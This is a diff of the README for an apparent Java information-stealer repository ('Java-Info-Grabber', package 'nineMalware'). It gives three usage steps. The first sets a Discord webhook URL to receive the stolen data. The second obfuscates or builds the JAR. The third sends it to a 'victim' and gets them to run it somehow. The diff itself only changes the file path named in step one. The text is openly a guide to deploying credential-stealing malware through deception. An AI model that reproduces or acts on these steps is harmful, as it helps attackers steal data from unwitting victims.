Ferrioz/Java-Info-Grabber/README.md

 <br>

 # How to use
- 1. Set the variable URL found in verifyWebhook.java to your webhook URL.
+ 1. Set the variable URL found in src/me/ferrioz/nineMalware/Connection/Discord/verifyWebhook.java to your webhook URL.
  2. Obfuscate or just build the JAR instantly.
 Who cares right?
  3. Send the JAR to your victim and somehow make them run it.